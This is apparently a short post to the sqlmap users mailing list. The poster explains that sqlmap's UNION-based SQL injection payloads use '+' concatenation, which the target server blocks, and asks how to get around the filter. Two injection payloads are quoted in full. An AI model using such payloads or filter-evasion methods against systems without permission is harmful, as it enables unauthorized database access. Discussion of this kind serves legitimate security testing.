I noticed that sqlmap is using '+' signs when doing union injection, and I can't seem to stop it from doing that (maybe there's a tamper script I missed?).
So I have a scenario where + is not allowed on the server. Thus the following payload works:

    -579 UNION ALL SELECT 1 --

While this one won't:

    -579 UNION ALL SELECT CHAR(58)+CHAR(110)+CHAR(104)+CHAR(113)+CHAR(58)+CHAR(111)+CHAR(118)+CHAR(107)+CHAR(99)+CHAR(77)+CHAR(73)+CHAR(82)+CHAR(122)+CHAR(100)+CHAR(76)+CHAR(58)+CHAR(120)+CHAR(98)+CHAR(101)+CHAR(58)--

Suggestions on how I could solve such a situation? :-)

_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users